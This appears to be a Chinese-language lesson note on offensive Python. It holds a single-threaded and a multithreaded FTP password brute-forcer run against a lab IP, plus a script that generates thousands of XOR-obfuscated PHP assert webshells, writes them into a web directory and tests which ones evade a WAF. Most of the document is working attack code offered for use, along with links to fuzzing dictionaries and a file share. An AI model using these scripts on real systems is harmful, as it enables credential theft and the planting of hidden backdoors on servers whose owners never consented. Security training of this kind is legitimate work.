78：Python开发-多线程Fuzz&Waf异或免杀&爆破

• 协议模块使用，Request爬虫技术，简易多线程技术，编码技术，Bypass后门技术

• 掌握利用强大的模块实现各种协议连接操作（爆破或利用等），配合Fuzz吊打WAF等

• queue,threading模块使用

案例2：利用FTP模块实现协议爆破脚本

• 1.ftplib模块使用
• 2.遍历用户及密码字典
• 3.尝试连接执行命令判断

# Author:Serena

import ftplib

#简单的模拟登录测试
#爆破：IP、端口、用户名、密码字典

def ftp_brute():
    ftp = ftplib.FTP()

    for username in open('ftp-user.txt'):
        for password in open('ftp-pwd.txt'):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            try:
                ftp.connect('192.168.56.110', 21)
                ftp.login(username,password)
                print(username+'|'+password+'| ok')
                list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
                print(list)
            except ftplib.all_errors:
                pass

if __name__ == '__main__':
    ftp_brute()

# Author:Serena

import ftplib,sys,queue,threading

#简单的模拟登录测试
#爆破：IP、端口、用户名、密码字典
import queue
import threading

def ftp_brute(ip,port):
    ftp = ftplib.FTP()
    ftp.connect(ip,port)
    while not q.empty():
        dict = q.get()
        dict = dict.split('|')
        username = dict[0]
        password = dict[1]
        try:
            ftp.login(username,password)
            print(username+'|'+password+'| ok')
            list = ftp.retrlines('list')     #此时可以获得当前ftp目录下的所有文件的信息
            print(list)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
            pass

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()
    for username in open(userfile):
        for password in open(passfile):
            username = username.replace('\n','')
            password = password.replace('\n','')
            # print(username+'|'+password)
            q.put(username + '|' + password)

    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute,args=(ip,port))
        t.start()

# 命令行执行：python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
# 可以再优化一下：检测到争取的用户名密码后停止

案例3：配合Fuzz实现免杀异或shell脚本

• 1.免杀异或shell原理讲解及开发思路（参考及举例：!^@，"^?等）
• 2.基于Fuzz思路生成大量Payload代码并有序命名写入网站文件中
• 3.基于多线程实现批量访问shell文件并提交测试是否正常连接回显

# Author:Serena
import time
import requests
import threading,queue

def bypass_check():
    while not q.empty():
        filename = q.get()
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x ': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if "XIAODI-PC" in result:
            print('check ->' + filename+'->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)

if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1,127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/WWW/x/' + filename, 'a+') as f:
                f.write(code)
                print("Fuzz文件生成成功")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()

涉及资源：

• fuzzdb（https://github.com/zhanye/fuzzdb）
• fuzzDicts（https://github.com/stemmm/fuzzDicts）
• Webshell免杀绕过waf（https://www.cnblogs.com/liujizhou/p/11806497.html）
• python ftplib模块（https://www.cnblogs.com/kaituorensheng/p/4480512.html）
• PHP异或（https://blog.csdn.net/qq_41617034/article/details/104441032）
• https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ，提取码：xiao